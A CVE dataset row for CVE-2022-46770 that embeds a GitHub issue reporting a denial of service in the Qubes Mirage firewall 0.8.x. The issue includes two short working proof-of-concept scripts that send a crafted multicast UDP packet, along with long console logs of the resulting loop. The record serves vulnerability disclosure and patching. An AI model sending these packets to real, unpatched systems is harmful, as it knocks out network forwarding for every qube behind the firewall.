cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2022-46770 | 2022-12-07T20:15:11.720 | qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of forwarding) via a crafted multicast UDP packet (IP address range of 224.0.0.0 through 239.255.255.255). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://packetstormsecurity.com/files/171610/Qubes-Mirage-Firewall-0.8.3-Denial-Of-Service.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mirage/qubes-mirage-firewall/issues/166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "http://packetstormsecurity.com/files/171610/Qubes-Mirage-Firewall-0.8.3-Denial-Of-Service.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mirage/qubes-mirage-firewall/issues/166"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:mirage_firewall:*:*:*:*:*:qubesos:*:*",
"matchCriteriaId": "8EF9D765-2D08-416F-96E9-897052A59AA2",
"versionEndExcluding": "0.8.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.8.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"835"
] | 835 | https://github.com/mirage/qubes-mirage-firewall/issues/166 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"mirage",
"qubes-mirage-firewall"
] | I used an mDNS fuzzer over the Mirage firewall and it run into problems resulting in DoS (99% CPU usage, stopped forwarding packets for all Qubes attached to the firewall instance).
Scapy output from fuzzer is quite verbose, but the minimalistic PoC is very simple.
```
###[ Ethernet ]###
dst = 01:00:5e:7f:ff:fa
src = 00:16:3e:5e:6c:00
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 635
id = 53
flags = DF
frag = 0
ttl = 1
proto = udp
chksum = None
src = 10.137.0.24
dst = 239.255.255.250
\options \
###[ UDP ]###
sport = 5353
dport = 5353
len = 615
chksum = None
###[ Raw ]###
load = 'aaaaaaaaaa(...)aaa'
```
Here is Scapy PoC (minimalized by removing setup of unrelated fields):
```python3
#!/usr/bin/env python3
from scapy.all import IP,UDP,send
PAYLOAD = 'a' * 607
dgram = UDP(sport=5353, dport=5353)/PAYLOAD
pkt = IP(dst='239.255.255.250')/dgram
pkt.show()
send(pkt)
```
I translated this into BSD socket API to void the need for Scapy framework (and running PoC as `root`):
```python3
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607
s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))
```
The test setup was:
[Qube running PoC] -> [Mirage firewall] -> [Net Qube]
Tested Mirage firewall versions:
v0.7.1 - ok
v0.8.x - vulnerable
Version v0.7.1 prints this into the console while processing the packet:
```
2022-12-04 01:06:26 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 2608, off 16384 proto 17, ttl 1, options
UDP port 42669 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61)
```
And the output form v0.8.x loops printing packet details forever:
```
Solo5: Xen console: port 0x2, ring @0x00000000FEFFF000
| ___|
__| _ \ | _ \ __ \
\__ \ ( | | ( | ) |
____/\___/ _|\___/____/
Solo5: Bindings version v0.7.4
Solo5: Memory map: 32 MB addressable:
Solo5: reserved @ (0x0 - 0xfffff)
Solo5: text @ (0x100000 - 0x31bfff)
Solo5: rodata @ (0x31c000 - 0x386fff)
Solo5: data @ (0x387000 - 0x540fff)
Solo5: heap >= 0x541000 < stack < 0x2000000
2022-12-04 01:20:07 -00:00: INF [qubes.rexec] waiting for client...
2022-12-04 01:20:07 -00:00: INF [qubes.db] connecting to server...
2022-12-04 01:20:07 -00:00: INF [qubes.db] connected
2022-12-04 01:20:07 -00:00: INF [qubes.db] got update: "/mapped-ip/10.137.0.24/visible-ip" = "10.137.0.24"
2022-12-04 01:20:07 -00:00: INF [qubes.db] got update: "/mapped-ip/10.137.0.24/visible-gateway" = "10.137.0.27"
2022-12-04 01:20:07 -00:00: INF [qubes.rexec] client connected, using protocol version 3
2022-12-04 01:20:07 -00:00: INF [unikernel] QubesDB and qrexec agents connected in 0.122 s
2022-12-04 01:20:07 -00:00: INF [dao] Got network configuration from QubesDB:
NetVM IP on uplink network: 10.137.0.18
Our IP on uplink network: 10.137.0.27
Our IP on client networks: 10.137.0.27
DNS primary resolver: 10.139.1.1
DNS secondary resolver: 10.139.1.2
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] connect 0
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] create: id=0 domid=33
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] sg:true gso_tcpv4:true rx_copy:true rx_flip:false smart_poll:false
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] MAC: 00:16:3e:5e:6c:00
2022-12-04 01:20:07 -00:00: INF [ethernet] Connected Ethernet interface 00:16:3e:5e:6c:00
2022-12-04 01:20:07 -00:00: INF [ARP] Sending gratuitous ARP for 10.137.0.27 (00:16:3e:5e:6c:00)
2022-12-04 01:20:07 -00:00: INF [ARP] Sending gratuitous ARP for 10.137.0.27 (00:16:3e:5e:6c:00)
2022-12-04 01:20:07 -00:00: INF [udp] UDP layer connected on 10.137.0.27
2022-12-04 01:20:07 -00:00: INF [dao] Watching backend/vif
2022-12-04 01:20:07 -00:00: INF [memory_pressure] Writing meminfo: free 20MiB / 27MiB (72.68 %)
2022-12-04 01:20:07 -00:00: WRN [uplink] Ignored unknown IPv4 message from uplink: Ignoring non-TCP/UDP packet: IPv4 packet 10.137.0.18 -> 224.0.0.22: id 0000, off 16384 proto 2, ttl 1, options
94 04 00 00
2022-12-04 01:20:08 -00:00: INF [client_net] add client vif {domid=52;device_id=0} with IP 10.137.0.24
2022-12-04 01:20:08 -00:00: WRN [uplink] Ignored unknown IPv4 message from uplink: Ignoring non-TCP/UDP packet: IPv4 packet 10.137.0.18 -> 224.0.0.22: id 0000, off 16384 proto 2, ttl 1, options
94 04 00 00
2022-12-04 01:20:08 -00:00: INF [client_net] Client 52 (IP: 10.137.0.24) ready
2022-12-04 01:20:08 -00:00: INF [ethernet] Connected Ethernet interface fe:ff:ff:ff:ff:ff
2022-12-04 01:20:08 -00:00: WRN [command] << Unknown command "QUBESRPC qubes.SetMonitorLayout dom0"
2022-12-04 01:20:08 -00:00: INF [client_eth:dom52:10.137.0.24] who-has 10.137.0.27? responding with fe:ff:ff:ff:ff:ff
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61)
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options
UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
(...)
```
This issue seems to be unrelated to #158, as this happens with the following ruleset:
```
dom0 ~ $ qvm-firewall test-mirage-firewall list
NO ACTION HOST PROTOCOL PORT(S) SPECIAL TARGET ICMP TYPE EXPIRE COMMENT
0 accept - - - - - - -
```
PoC demo on YouTube:
[](https://youtu.be/KbGDlr_IUCE) | Mirage v0.8.x DoS from untrusted Qube by sending arbitrary UDP payload | https://api.github.com/repos/mirage/qubes-mirage-firewall/issues/166/comments | 8 | 2022-12-04T02:20:24Z | 2022-12-07T19:40:53Z | https://github.com/mirage/qubes-mirage-firewall/issues/166 | 1,474,353,836 | 166 | 4,487 |
